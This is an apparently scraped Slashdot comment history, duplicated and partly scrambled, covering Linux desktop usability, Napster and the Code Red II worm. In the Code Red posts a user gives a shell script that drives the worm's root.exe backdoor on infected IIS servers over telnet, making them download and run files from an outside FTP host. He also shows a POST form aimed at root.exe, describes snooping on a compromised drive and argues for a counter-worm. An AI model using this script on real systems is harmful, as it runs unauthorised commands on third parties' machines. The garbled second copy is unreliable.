Or any Java applet that does a "security, management, or optimization" function? Or a javascript file that does this? Wtf is an "automatically executing software package".. that is so vague and could be anything from an HTML page ('execution' meaning 'render') to an.exe file. If it's an.exe file, then it doesn't "automatically execute" it is executed by the user.
I love how they use vague terms such as "automatically executing software package" and "markup language" in order to make sure they have all the bases covered, not just their stupid (probably buggy) solution that uses a specific type of software package and a specific type of markup language.
I'm 20 years old and EVERYONE I interact with at college occasionally uses the word ghetto as an adjective. Giving me the teenager skript kiddie treatment really pisses me off.
People who decide that it's their personal responsibility to dictate what is offensive to others (and in turn try to restrict others from causing offense) are usually low on self esteem themselves and have nothing better to do. I'm sure a Jewish grandmother would be having a heart attack when she saw you stereotyping her as giving a shit about the use of the word ghetto. Good job bringing the Nazis into this, BTW.
My problem wasn't with "getting used to the environment".. I know that's part of the learning curve you enounter whenever you start with a new version of an OS. My problem was the damn thing just feels slow and unresponsive.. like when your car needs new brakes or something.
If you do not feel in control of the computer, you cannot get any work done because you have a feeling of helplessness. This is a fundamental principle of GUI design, and was something I encountered with Mandrake.
You've got to be kidding me thinking that I could just tar up a few directories and unload them a few months later on a completely different distro, etc. Every distro I've installed, and every install I've done at different times, have required different subtlties in the way they are set up on the filesystem and things like that.
Linux changes fast and often, and a negative result of this is that there is really no "one way" that distributions have settled on doing something even as simple as startup scripts.
Don't whine about W98, it is a piece of shit and everyone knows it. We're talking about XP/2k here.
I think you can get rid of that preview if you turn off the display folders as web view or whatever, but I might be mistaken.
I was basically playing with simple stuff like terminal sessions, GUI file manipulation, GNOME configuration, etc. I toyed with the GIMP a bit, played with StarOffice, etc. At the end of a few hours of playing I came to the conclusion that the annoying feeling of waiting, sluggishness, and the subsequent helplessness that comes when you are unable to feel in control of a GUI outweighed my urge to run an open source OS for real. The GUI is still fundamentally ugly as well, but that wasn't my real motivation for fdisking the thing off my drive.
I'd love to get away from MS as much as the next guy, but their OS is still superior in terms of usability, and until the gap is lessed a considerable amount, I simply can't bear to run Linux.
I run linux for my server for half-empty. I'm far from "too stupid" to run Linux. Regardless, the topic at hand here is ease of use, and ease of use, weither you like it or not, is the concept of making a system that "stupid" people can use.
I said that it would be possible for my Mandrake install to become usable if I tweaked it to hell and back (like I have done in the past with Debian, Slack, Redhat, etc.) but I didn't feel like it this time; I didn't feel it was worth my effort.
The "you don't have to use it if you don't want to" comments here are pretty lame, and in this case, totally inapplicable. Since we're talking about ease of use stuff like network detection (which, despite the authors assertion, as been there since win95) we're not talking about me here, a geek, we're talking about the proverbial Joe Sixpack. It might be hard for you to fathom, but I *would* like to see Linux succeed, and I do feel that is a success in the server world. However, its dillusional to think that XP is copying Linux. It needed to be said, so I said it.
I don't know much about what XP "phones home" or whatever, but you can switch the GUI back to classic mode, which I'm guessing gets rid of the slowdown(s).
That comment about XP copying Linux is pretty funny. I know I'll get modded to hell for saying this, but I just have to. I just recently installed Mandrake on a separate drive and had to nuke the whole thing after an evening of use. Basically, I try Linux on the desktop every couple months to see if it's finally getting usable. It only took me a few hours to realize Mandrake is nowhere near usable.. out of the box it's slow, the apps are still as ghetto as they were 6 months ago (When I tried running Debian on the desktop) and it just plain sucks to use. Perhaps it was because I was using GNOME, but regardless, to say XP is stealing the great features of Mandrake is simply ridiculous. (The link to the article is dead, so I can't get into much detail) It's possible that if I had tweaked the system on a geek level and didn't use GNOME it would have been better, but I simply didn't want to waste my time once again doing the "week long Linux march" that I do whenever I decide to install it. I'll never use Linux on the desktop until I can just install it and have it work and be FAST. I was impressed with how easily Mandrake installed, but the fireworks stopped as soon as it came time for me to actually get some work done.
And, yes, I've run linux on the desktop for months at a time in the past, so I'm not a newbie and I do have a good sense of how usable the system is going to be for me in the long run based upon playing with it for a few hours.
XP doesn't require a Passport account, and it is damn usable. The new GUI is pretty damn good, IMHO, and for the guy who referred to the taskbar being for idiots or whatever, well, you can hide it. It's configurable for the experienced and it took me about 10 minutes to turn off all the dumbing down features that are in there for the computer illiterate. One thing MS does do right is understand that not everyone is a geek.. and this is why Linux will never become mainstream unless a well off company comes in and takes it under its wing and starts a massive usability testing campaign. For example, I found the most functional and well designed apps to be (although they were notoriously slow) evolution and nautilus, and, surprise surprise, they were designed and created by companies.
The geeks will always design for geeks, which is all well and good, but don't go saying that Microsoft products are playing catch up to Linux in ease of use. That's just ridiculous:)
Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.
The intention isn't the same as crackers though, writing a script to patch and restart IIS not an in your face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update complements of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.
If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)
(Copied from the other thread, for those who are working on a way to fix this worm)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory/pub/cr
DIR="%2fpub%2fcr"
echo GET/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
sleep 1
echo GET/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory/pub/cr
DIR="%2fpub%2fcr"
echo GET/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
sleep 1
echo GET/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
sleep 1
echo GET/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ec
md | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore:)
I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff setup on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.
The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.
Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.
I'm also guessing that right now a bunch of/.'ers are doing one of two things:
1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers
I propose that if a script is created to fix these servers (Code Green?:)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmin's and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and a even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.
So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.
Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh:)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me).. I can't seem to figure it out.
I tried variants of the following:
<HTML>
<BODY>
<FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
<INPUT TYPE="SUBMIT" NAME="" VALUE="exit ">
</FORM>
</BODY></HTML>
trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.
As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.
I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per say, but perhaps the old code red does something to tell the new code red to "come here" or something?
The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independant cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.
I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.
Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green?:)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of a incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)
The author obviously wasn't a script kiddie. It takes a good amount of brains to code that little beast.
It was obviously a warning. It was not a perlscript that did some silly exploit, it was a hand crafted and well designed virus that did what it was supposed to do, scare the shit out of us.
I don't understand why they don't all jump ship and do something else. It's plain obvious that they're never going to be "allowed" to do what they want to do. They'll keep bringing them to court until they run out of money. Is it because they have investors who will break their legs and other bits if they fail completely?
This is getting ridiculous. First they filter everything.. and just when you thought that the RIAA et al couldn't pick on them any worse they decide they should switch away from MP3. They might as well just have a court rule that Napster can no longer use eletricity in their operations. Are you kidding me? I'm guessing the number of people who will be using Napster when they make the switch will be countable on my fingers and toes, if that. I don't think the Winamp developers and other players will bother implementing a codec for this crap, and even if Napster makes one, I doubt they'd even include it since it's just plain stupid.
Ok first off I am not an "open source person":) Secondly, the Ogg Vorbis idea is not something I would ever have the time, energy, or resources to do.
Anyway, the concept would basically be two things. Take the gnutella network and 1) Make a client that looked and felt exactly like Napster and 2) (not necessary) filter all but Ogg Vorbis files. Perhaps make it an alternative network for speed reason. The problem with the "geek" clients such as gnutella et al not being used by the average dude like Napster was is because they're unaware that they exist or they're too hard to use. If you made a Napster replacement using gnutella you would get around the legal reprecussions (no central server, nobody can shut it down) while letting all the ex-Napster users jump right in. The RIAA couldn't go after anyone except the software developer, and even then, they have no case since the software developer isn't running the network.
Filtering in the Ogg Vorbis stuff exclusively would be an additional benefit in getting the.ogg format to be the standard instead of.mp3.. not necessarily my goal (I'm too busy running a site and building another) but a goal many "open source people" have undoubtedly.
Slashdot Mirror
Or any Java applet that does a "security, management, or optimization" function? Or a javascript file that does this? Wtf is an "automatically executing software package" .. that is so vague and could be anything from an HTML page ('execution' meaning 'render') to an .exe file. If it's an .exe file, then it doesn't "automatically execute" it is executed by the user.
I love how they use vague terms such as "automatically executing software package" and "markup language" in order to make sure they have all the bases covered, not just their stupid (probably buggy) solution that uses a specific type of software package and a specific type of markup language.
Cry me a river.
I'm 20 years old and EVERYONE I interact with at college occasionally uses the word ghetto as an adjective. Giving me the teenager skript kiddie treatment really pisses me off.
People who decide that it's their personal responsibility to dictate what is offensive to others (and in turn try to restrict others from causing offense) are usually low on self esteem themselves and have nothing better to do. I'm sure a Jewish grandmother would be having a heart attack when she saw you stereotyping her as giving a shit about the use of the word ghetto. Good job bringing the Nazis into this, BTW.
My problem wasn't with "getting used to the environment" .. I know that's part of the learning curve you enounter whenever you start with a new version of an OS. My problem was the damn thing just feels slow and unresponsive.. like when your car needs new brakes or something.
If you do not feel in control of the computer, you cannot get any work done because you have a feeling of helplessness. This is a fundamental principle of GUI design, and was something I encountered with Mandrake.
You've got to be kidding me thinking that I could just tar up a few directories and unload them a few months later on a completely different distro, etc. Every distro I've installed, and every install I've done at different times, have required different subtlties in the way they are set up on the filesystem and things like that.
Linux changes fast and often, and a negative result of this is that there is really no "one way" that distributions have settled on doing something even as simple as startup scripts.
Don't whine about W98, it is a piece of shit and everyone knows it. We're talking about XP/2k here.
I think you can get rid of that preview if you turn off the display folders as web view or whatever, but I might be mistaken.
I was basically playing with simple stuff like terminal sessions, GUI file manipulation, GNOME configuration, etc. I toyed with the GIMP a bit, played with StarOffice, etc. At the end of a few hours of playing I came to the conclusion that the annoying feeling of waiting, sluggishness, and the subsequent helplessness that comes when you are unable to feel in control of a GUI outweighed my urge to run an open source OS for real. The GUI is still fundamentally ugly as well, but that wasn't my real motivation for fdisking the thing off my drive.
I'd love to get away from MS as much as the next guy, but their OS is still superior in terms of usability, and until the gap is lessed a considerable amount, I simply can't bear to run Linux.
I run linux for my server for half-empty. I'm far from "too stupid" to run Linux. Regardless, the topic at hand here is ease of use, and ease of use, weither you like it or not, is the concept of making a system that "stupid" people can use.
I said that it would be possible for my Mandrake install to become usable if I tweaked it to hell and back (like I have done in the past with Debian, Slack, Redhat, etc.) but I didn't feel like it this time; I didn't feel it was worth my effort.
The "you don't have to use it if you don't want to" comments here are pretty lame, and in this case, totally inapplicable. Since we're talking about ease of use stuff like network detection (which, despite the authors assertion, as been there since win95) we're not talking about me here, a geek, we're talking about the proverbial Joe Sixpack. It might be hard for you to fathom, but I *would* like to see Linux succeed, and I do feel that is a success in the server world. However, its dillusional to think that XP is copying Linux. It needed to be said, so I said it.
I don't know much about what XP "phones home" or whatever, but you can switch the GUI back to classic mode, which I'm guessing gets rid of the slowdown(s).
That comment about XP copying Linux is pretty funny. I know I'll get modded to hell for saying this, but I just have to. I just recently installed Mandrake on a separate drive and had to nuke the whole thing after an evening of use. Basically, I try Linux on the desktop every couple months to see if it's finally getting usable. It only took me a few hours to realize Mandrake is nowhere near usable.. out of the box it's slow, the apps are still as ghetto as they were 6 months ago (When I tried running Debian on the desktop) and it just plain sucks to use. Perhaps it was because I was using GNOME, but regardless, to say XP is stealing the great features of Mandrake is simply ridiculous. (The link to the article is dead, so I can't get into much detail) It's possible that if I had tweaked the system on a geek level and didn't use GNOME it would have been better, but I simply didn't want to waste my time once again doing the "week long Linux march" that I do whenever I decide to install it. I'll never use Linux on the desktop until I can just install it and have it work and be FAST. I was impressed with how easily Mandrake installed, but the fireworks stopped as soon as it came time for me to actually get some work done.
:)
And, yes, I've run linux on the desktop for months at a time in the past, so I'm not a newbie and I do have a good sense of how usable the system is going to be for me in the long run based upon playing with it for a few hours.
XP doesn't require a Passport account, and it is damn usable. The new GUI is pretty damn good, IMHO, and for the guy who referred to the taskbar being for idiots or whatever, well, you can hide it. It's configurable for the experienced and it took me about 10 minutes to turn off all the dumbing down features that are in there for the computer illiterate. One thing MS does do right is understand that not everyone is a geek.. and this is why Linux will never become mainstream unless a well off company comes in and takes it under its wing and starts a massive usability testing campaign. For example, I found the most functional and well designed apps to be (although they were notoriously slow) evolution and nautilus, and, surprise surprise, they were designed and created by companies.
The geeks will always design for geeks, which is all well and good, but don't go saying that Microsoft products are playing catch up to Linux in ease of use. That's just ridiculous
Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.
The intention isn't the same as crackers though, writing a script to patch and restart IIS not an in your face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update complements of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.
If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)
(Copied from the other thread, for those who are working on a way to fix this worm)
/pub/cr
/scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
/scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
/scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80
:)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $ftp and $dir values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
echo GET
sleep 1
echo GET
sleep 1
echo GET
md | telnet $1 80
# Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
sleep 1
echo GET
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff setup on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.
The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.
Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.
/.'ers are doing one of two things:
:)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmin's and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and a even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.
I'm also guessing that right now a bunch of
1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers
I propose that if a script is created to fix these servers (Code Green?
So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.
Thanks.
Holy shit.
In the root directory of the drive there's an HTML file with the "Fuck USA goverment" tag or whatever. I am not doing anymore snooping.
The shit has hit the fan, ladies and gents.
Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh :)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me) .. I can't seem to figure it out.
I tried variants of the following:
<HTML>
<BODY>
<FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
<INPUT TYPE="SUBMIT" NAME="" VALUE="exit ">
</FORM>
</BODY></HTML>
trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.
As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.
I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per say, but perhaps the old code red does something to tell the new code red to "come here" or something?
The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independant cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.
I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.
:)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of a incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)
Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green?
The author obviously wasn't a script kiddie. It takes a good amount of brains to code that little beast.
It was obviously a warning. It was not a perlscript that did some silly exploit, it was a hand crafted and well designed virus that did what it was supposed to do, scare the shit out of us.
(+1: First /. post to make me laugh aloud in a long time [besides trolls, of course])
You.SenseOfHumor() == null
Open source commodity software is devoid of bugs.
Riiiiight.
For all of 'em:
:)
Chinese "Code Red" Internet Worm misses White House, Microsoft issues fix
Because of course, this is the most positive way to word it for M$
I don't understand why they don't all jump ship and do something else. It's plain obvious that they're never going to be "allowed" to do what they want to do. They'll keep bringing them to court until they run out of money. Is it because they have investors who will break their legs and other bits if they fail completely?
This is getting ridiculous. First they filter everything.. and just when you thought that the RIAA et al couldn't pick on them any worse they decide they should switch away from MP3. They might as well just have a court rule that Napster can no longer use eletricity in their operations. Are you kidding me? I'm guessing the number of people who will be using Napster when they make the switch will be countable on my fingers and toes, if that. I don't think the Winamp developers and other players will bother implementing a codec for this crap, and even if Napster makes one, I doubt they'd even include it since it's just plain stupid.
I kind of feel bad for them, though.
You know, IntelliNaming and ActiveConventions are worse.
Ok first off I am not an "open source person" :) Secondly, the Ogg Vorbis idea is not something I would ever have the time, energy, or resources to do.
.ogg format to be the standard instead of .mp3.. not necessarily my goal (I'm too busy running a site and building another) but a goal many "open source people" have undoubtedly.
Anyway, the concept would basically be two things. Take the gnutella network and 1) Make a client that looked and felt exactly like Napster and 2) (not necessary) filter all but Ogg Vorbis files. Perhaps make it an alternative network for speed reason. The problem with the "geek" clients such as gnutella et al not being used by the average dude like Napster was is because they're unaware that they exist or they're too hard to use. If you made a Napster replacement using gnutella you would get around the legal reprecussions (no central server, nobody can shut it down) while letting all the ex-Napster users jump right in. The RIAA couldn't go after anyone except the software developer, and even then, they have no case since the software developer isn't running the network.
Filtering in the Ogg Vorbis stuff exclusively would be an additional benefit in getting the